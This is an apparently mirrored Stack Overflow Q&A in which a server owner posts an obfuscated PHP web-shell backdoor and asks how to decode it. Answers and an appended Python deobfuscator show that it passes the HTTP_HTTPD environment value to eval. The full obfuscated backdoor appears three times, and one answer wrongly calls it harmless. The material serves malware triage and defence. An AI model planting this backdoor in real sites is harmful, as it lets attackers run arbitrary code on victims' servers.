Question

I have found a suspicious file on my server, and I am attempting to decode it and figure out what it was put there to do.

The code is as follows; any tips on how to decode this?

<?php if(!function_exists("mystr1s45")){class mystr1s21 { static $mystr1s279="S\x46\x52U\x55F9\x49VFR\x51\x52A\x3d="; static $mystr1s178="b\x61\x73e\x364\x5fde\x63\x6fd\x65"; }eval("e\x76\x61\x6c\x28\x62a\x73e\x364\x5f\x64\x65c\x6f\x64\x65\x28\x27Zn\x56uY\x33Rpb\x324\x67bX\x6czd\x48\x49xcz\x634KC\x52teX\x4e\x30c\x6aF\x7aO\x54\x6bp\x65yR\x37I\x6cx\x34\x4emRc\x65D\x635c1\x78\x34NzR\x79X\x48gz\x4dXNc\x65DMx\x4dVx\x34Mz\x41if\x541t\x65XN\x30cj\x46zMj\x45\x36\x4fi\x52\x37\x49\x6cx\x34NmR\x35\x63\x31\x784Nz\x52y\x4dV\x78\x34\x4ez\x4d\x78Nzg\x69f\x54ty\x5aXR1\x63m4\x67J\x48sib\x58l\x63\x65\x44\x63zd\x46x4N\x7aJce\x44Mxc\x7aF\x63e\x44M\x78MCJ\x39K\x43\x42teX\x4e\x30\x63\x6aFzM\x6a\x456Oi\x527J\x48si\x58Hg\x32ZH\x6c\x63e\x44czd\x48J\x63\x65D\x4dxc\x7a\x6c\x63eDM\x35\x49\x6e19I\x43k\x37\x66Q\x3d\x3d\x27\x29\x29\x3be\x76a\x6c\x28\x62a\x73e\x364\x5f\x64e\x63o\x64\x65\x28\x27ZnV\x75Y3\x52pb\x324\x67b\x58\x6c\x7adHI\x78c\x7a\x51\x31KC\x52\x74eX\x4e0cj\x46zNj\x59\x70IH\x74y\x5aXR1\x63m\x34g\x62Xl\x7ad\x48I\x78czI\x78\x4fj\x6f\x6beyR\x37\x49m1\x35\x58Hg\x33\x4d3Rc\x65D\x63yMX\x4eceD\x4d2\x4e\x69\x4a9f\x54t\x39\x27\x29\x29\x3b");} $mystr1s2235=@getenv(mystr1s78("\x6dys\x74r1s\x3279"));if($mystr1s2235) {@eval($mystr1s2235);} ?>

Thanks,

Alan.


Solution

The functions in php you're looking for appear to be a combination of base64_decode and urldecode. For example:

urldecode("\x6d\x79s\x74r\x31s\x311\x30");

gives "mystr1s110"

Also part of the string in the eval statement base64_decodes to:

function mystr1s78($mystr1s99){${"\x6d\x79s\x74r\x31s\x311\x30"}=mystr1s21::${"\x6dys\x74r1\x73178"};return ${"my\x73t\x72\x31s1\x310"}( mystr1s21::${${"\x6dy\x73tr\x31s9\x39"}} );}

Those encoded strings all reference variables defined earlier; for example, \x6d\x79s\x74r\x31s\x311\x30 url-decodes to mystr1s110.

This looks very nasty to me, although I'm no security expert. I would just php -a and figure out what chunks are decoded how, then reconstruct the code from there.

On a side note: you pulled this off the server, right?

EDIT:

Was kind of intrigued by this. After a complete decode I got this:

<?php 

if(!function_exists("myFunction2")){

class myClass {
    static $myVar1="SFRUUF9IVFRQRA=="; 
    static $myVar2="base64_decode"; 
}

function myFunction1($myArg)
{
    $myVar4=myClass::$myVar2;  // myClass::$myVar2 is just "base64_decode"
    return $myVar4( myClass::${$myArg} );  // returning base64_decode of the argument
}

function myFunction2($myArg2) 
{
    return myClass::${$myArg2};  // returns the static property named by the argument
} 

}

$myFinalVar=@getenv(myFunction1('myVar1'));   // just gets the env variable named by the base64 decode of myVar1

if($myFinalVar) {
    @eval($myFinalVar);  // executes it
} 

?>

Looks to me like it's a script designed to execute a script on another server (i.e. they could just hit the web address with their script in the URL and it would execute). SFRUUF9IVFRQRA== decodes to HTTP_HTTPD, so they could hit http://yourwebsite.com/thisscript.php?HTTP_HTTPD=myscriptaddress.php and it would run whatever they wanted on your server.

OTHER TIPS

In my opinion, it is not a harmful script; in fact, it is not of any use.

Here is the basis for my comments:

To decode, you can simply put the hex strings as argument to print_r().

print_r("b\x61\x73e\x364\x5fde\x63\x6fd\x65");

Complete decoded code is:

<?php 
if(!function_exists("mystr1s45")){
    class mystr1s21 { 
        static $mystr1s279="SFRUUF9IVFRQRA==";
        static $mystr1s178="base64_decode"; 
    }
    eval(
        eval(
            function mystr1s78($mystr1s99){ // returns 'HTTP_HTTPD'
                ${"mystr1s110"}=mystr1s21::${"mystr1s178"};
                return ${"mystr1s110"}( mystr1s21::${${"mystr1s99"}} );
            }
        );
        eval(
            function mystr1s45($mystr1s66) {
                return mystr1s21::${${"mystr1s66"}};
            }
        );
    );
}
$mystr1s2235=@getenv(mystr1s78("mystr1s279"));
if($mystr1s2235) {
    @eval($mystr1s2235);
}
?>

The function mystr1s78 will return 'HTTP_HTTPD'. This will be used as an environment variable name whose value is fetched using getenv.

If you run the decoded code, you will face a parse error near the definition of function mystr1s78. This is because eval expects a string, and the string must be a valid code statement (not an expression).

Parse error: syntax error, unexpected 'mystr1s78' (T_STRING), expecting '('

As far as I know, by default, HTTP_HTTPD is not an environment variable set by Apache or any web server, and even if it is a variable with some value, passing it to eval will not do anything.

To confirm, you can set an environment variable HTTP_HTTPD as follows:

<?php 
apache_setenv('HTTP_HTTPD',<some_value>);
if(!function_exists("mystr1s45")){class mystr1s21 { static $mystr1s279="S\x46\x52U\x55F9\x49VFR\x51\x52A\x3d="; static $mystr1s178="b\x61\x73e\x364\x5fde\x63\x6fd\x65"; }eval("e\x76\x61\x6c\x28\x62a\x73e\x364\x5f\x64\x65c\x6f\x64\x65\x28\x27Zn\x56uY\x33Rpb\x324\x67bX\x6czd\x48\x49xcz\x634KC\x52teX\x4e\x30c\x6aF\x7aO\x54\x6bp\x65yR\x37I\x6cx\x34\x4emRc\x65D\x635c1\x78\x34NzR\x79X\x48gz\x4dXNc\x65DMx\x4dVx\x34Mz\x41if\x541t\x65XN\x30cj\x46zMj\x45\x36\x4fi\x52\x37\x49\x6cx\x34NmR\x35\x63\x31\x784Nz\x52y\x4dV\x78\x34\x4ez\x4d\x78Nzg\x69f\x54ty\x5aXR1\x63m4\x67J\x48sib\x58l\x63\x65\x44\x63zd\x46x4N\x7aJce\x44Mxc\x7aF\x63e\x44M\x78MCJ\x39K\x43\x42teX\x4e\x30\x63\x6aFzM\x6a\x456Oi\x527J\x48si\x58Hg\x32ZH\x6c\x63e\x44czd\x48J\x63\x65D\x4dxc\x7a\x6c\x63eDM\x35\x49\x6e19I\x43k\x37\x66Q\x3d\x3d\x27\x29\x29\x3be\x76a\x6c\x28\x62a\x73e\x364\x5f\x64e\x63o\x64\x65\x28\x27ZnV\x75Y3\x52pb\x324\x67b\x58\x6c\x7adHI\x78c\x7a\x51\x31KC\x52\x74eX\x4e0cj\x46zNj\x59\x70IH\x74y\x5aXR1\x63m\x34g\x62Xl\x7ad\x48I\x78czI\x78\x4fj\x6f\x6beyR\x37\x49m1\x35\x58Hg\x33\x4d3Rc\x65D\x63yMX\x4eceD\x4d2\x4e\x69\x4a9f\x54t\x39\x27\x29\x29\x3b");} $mystr1s2235=@getenv(mystr1s78("\x6dys\x74r1s\x3279"));if($mystr1s2235) {@eval($mystr1s2235);} 

?>

Please let us know if you think this is malicious and can harm the system.
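The decoding both answers do by hand (printing the literal in php -a, base64-decoding the eval payload) can be done offline in a few lines, which is safer than running anything from the file on a PHP interpreter. The \xNN sequences are ordinary PHP double-quoted-string escapes, which is why printing the literal shows plain text. This is an added example, not code from the question or either answer: SAMPLE is the file exactly as posted in the question, and getenv_lookup assumes, as the answers establish for this sample, that the wrapper function passed to getenv() simply returns the base64-decoded static property it is handed.

```python
import base64
import binascii
import re

# The obfuscated file exactly as posted in the question above (not constructed).
SAMPLE = r'''<?php if(!function_exists("mystr1s45")){class mystr1s21 { static $mystr1s279="S\x46\x52U\x55F9\x49VFR\x51\x52A\x3d="; static $mystr1s178="b\x61\x73e\x364\x5fde\x63\x6fd\x65"; }eval("e\x76\x61\x6c\x28\x62a\x73e\x364\x5f\x64\x65c\x6f\x64\x65\x28\x27Zn\x56uY\x33Rpb\x324\x67bX\x6czd\x48\x49xcz\x634KC\x52teX\x4e\x30c\x6aF\x7aO\x54\x6bp\x65yR\x37I\x6cx\x34\x4emRc\x65D\x635c1\x78\x34NzR\x79X\x48gz\x4dXNc\x65DMx\x4dVx\x34Mz\x41if\x541t\x65XN\x30cj\x46zMj\x45\x36\x4fi\x52\x37\x49\x6cx\x34NmR\x35\x63\x31\x784Nz\x52y\x4dV\x78\x34\x4ez\x4d\x78Nzg\x69f\x54ty\x5aXR1\x63m4\x67J\x48sib\x58l\x63\x65\x44\x63zd\x46x4N\x7aJce\x44Mxc\x7aF\x63e\x44M\x78MCJ\x39K\x43\x42teX\x4e\x30\x63\x6aFzM\x6a\x456Oi\x527J\x48si\x58Hg\x32ZH\x6c\x63e\x44czd\x48J\x63\x65D\x4dxc\x7a\x6c\x63eDM\x35\x49\x6e19I\x43k\x37\x66Q\x3d\x3d\x27\x29\x29\x3be\x76a\x6c\x28\x62a\x73e\x364\x5f\x64e\x63o\x64\x65\x28\x27ZnV\x75Y3\x52pb\x324\x67b\x58\x6c\x7adHI\x78c\x7a\x51\x31KC\x52\x74eX\x4e0cj\x46zNj\x59\x70IH\x74y\x5aXR1\x63m\x34g\x62Xl\x7ad\x48I\x78czI\x78\x4fj\x6f\x6beyR\x37\x49m1\x35\x58Hg\x33\x4d3Rc\x65D\x63yMX\x4eceD\x4d2\x4e\x69\x4a9f\x54t\x39\x27\x29\x29\x3b");} $mystr1s2235=@getenv(mystr1s78("\x6dys\x74r1s\x3279"));if($mystr1s2235) {@eval($mystr1s2235);} ?>'''

# Escapes PHP expands inside a double-quoted string: \xHH (one or two hex
# digits, so "\x311" is "1" followed by a literal "1"), octal \NNN, and the
# usual single-letter escapes.
_ESCAPE_RE = re.compile(r'\\(x[0-9A-Fa-f]{1,2}|[0-7]{1,3}|[nrtvef\\$"])')
_SIMPLE_ESCAPES = {'n': '\n', 'r': '\r', 't': '\t', 'v': '\v', 'e': '\x1b',
                   'f': '\f', '\\': '\\', '$': '$', '"': '"'}


def php_unescape(literal):
    """Expand the escape sequences of a PHP double-quoted string body."""
    def repl(match):
        esc = match.group(1)
        if esc[0] == 'x':
            return chr(int(esc[1:], 16))
        if esc[0] in '01234567':
            return chr(int(esc, 8) & 0xFF)
        return _SIMPLE_ESCAPES[esc]
    return _ESCAPE_RE.sub(repl, literal)


# A double-quoted PHP literal: anything but an unescaped quote, escapes allowed.
_DQ_STRING_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')


def normalize_strings(code):
    """Rewrite every double-quoted literal with its escapes expanded, so the
    real identifiers ("base64_decode", "mystr1s279", ...) become readable."""
    def repl(match):
        text = php_unescape(match.group(1))
        return '"' + text.replace('\\', '\\\\').replace('"', '\\"') + '"'
    return _DQ_STRING_RE.sub(repl, code)


# eval(base64_decode('...')) with either quote style around the payload.
_EVAL_B64_RE = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*(['"])([A-Za-z0-9+/=]+)\1\s*\)\s*\)""")


def peel_layers(code, max_depth=8):
    """Return [normalized code, payload 1, payload 2, ...]: every
    eval(base64_decode(...)) payload is decoded and itself peeled."""
    top = normalize_strings(code)
    layers = [top]
    if max_depth == 0:
        return layers
    for match in _EVAL_B64_RE.finditer(top):
        payload = base64.b64decode(match.group(2)).decode('latin-1')
        layers.extend(peel_layers(payload, max_depth - 1))
    return layers


_STATIC_RE = re.compile(r'static\s+\$(\w+)\s*=\s*"([^"]*)"')


def static_properties(normalized_code):
    """Collect `static $name="value";` pairs; values that round-trip as
    printable base64 are reported decoded (so SFRUUF9IVFRQRA== -> HTTP_HTTPD)."""
    found = {}
    for name, value in _STATIC_RE.findall(normalized_code):
        try:
            raw = base64.b64decode(value, validate=True)
            if base64.b64encode(raw).decode() != value or not all(32 <= b < 127 for b in raw):
                raise ValueError('not a clean base64 string')
            found[name] = raw.decode('ascii')
        except (binascii.Error, ValueError):
            found[name] = value
    return found


# getenv(wrapper("name")): assumption (true for this sample, see the answers)
# that the wrapper returns the decoded static property called "name".
_GETENV_RE = re.compile(r'getenv\s*\(\s*(\w+)\s*\(\s*"(\w+)"\s*\)\s*\)')


def getenv_lookup(normalized_code, statics):
    """Return (wrapper function, resolved environment variable name) or None."""
    match = _GETENV_RE.search(normalized_code)
    if not match:
        return None
    wrapper, name = match.groups()
    return wrapper, statics.get(name)


def analyze(code):
    """Peel the file and report what a triage analyst needs: the decoded
    layers, the decoded statics, the getenv() name, and whether a plain
    variable is passed to eval()."""
    layers = peel_layers(code)
    statics = static_properties(layers[0])
    return {
        'layers': layers,
        'statics': statics,
        'getenv': getenv_lookup(layers[0], statics),
        'evals_variable': bool(re.search(r'@?eval\s*\(\s*\$\w+\s*\)', layers[0])),
    }


if __name__ == '__main__':
    report = analyze(SAMPLE)
    for i, layer in enumerate(report['layers']):
        print(f'--- layer {i} ---\n{layer}\n')
    print('statics:', report['statics'])
    print('getenv(wrapper(name)):', report['getenv'])
    print('variable passed to eval():', report['evals_variable'])
```

Running it yields three layers: the normalized outer file, the definition of mystr1s78 (a thin base64_decode wrapper) and the definition of mystr1s45; the two statics decode to base64_decode and HTTP_HTTPD, and the tail of the file passes getenv('HTTP_HTTPD') straight to eval(). For triage that data flow, a value the script does not control reaching eval(), is the finding on its own; it is what a scanner should flag regardless of how the variable comes to be set.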

Licensed under: CC-BY-SA with attribution
Not affiliated with StackOverflow